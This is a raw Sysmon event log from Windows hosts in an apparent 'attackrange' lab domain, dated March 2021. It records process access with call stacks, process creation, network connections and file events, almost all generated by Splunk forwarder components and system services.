16:29:20.974{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245797Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:20.974{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245796Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:20.974{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245795Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:20.974{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245794Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:20.974{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245793Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:20.974{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245792Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:20.974{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245791Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:20.974{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245790Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:20.974{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245789Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:20.974{CB4067E1-304A-6062-0500-00000000AF01}392508C:\Windows\system32\csrss.exe{CB4067E1-51E0-6063-B122-00000000AF01}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245788Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:20.974{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-51E0-6063-B122-00000000AF01}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245787Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:20.974{CB4067E1-51E0-6063-B122-00000000AF01}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000245786Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:19.529{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64779-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245785Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:20.099{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5FF5FDEB3EFE5D3D07245B63FF825812,SHA256=23340184FE23F9610731CAC6DA9738DFFA0F46F4491C65602B08564B7553BCCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245784Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:20.099{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0EE91A67DEB46DB6EB7EFF232DEE0566,SHA256=6ADD2933A8ABD0AE1C013AC26DA6273B67ADF61F83919055C33A2A5F182F3CCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061099Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:21.793{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7A7C101FD49988C7396724C7939458D,SHA256=DCCC7799F8EAD0C648E2C2BC9EF3BC1E8C4EC4B01FF2063C544BCBC1B103A74F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061098Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:18.420{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54803-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local389ldap 354300x80000000000000001061097Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:18.420{7F8C56E7-4E4C-6063-3100-00000000AF01}2384C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54803-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local389ldap 10341000x8000000000000000245814Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:21.646{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-51E1-6063-B222-00000000AF01}380C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245813Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:21.646{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245812Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:21.646{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245811Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:21.646{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245810Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:21.646{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245809Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:21.646{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245808Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:21.646{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245807Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:21.646{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245806Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:21.646{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245805Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:21.646{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245804Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:21.646{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-51E1-6063-B222-00000000AF01}380C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245803Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:21.646{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-51E1-6063-B222-00000000AF01}380C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 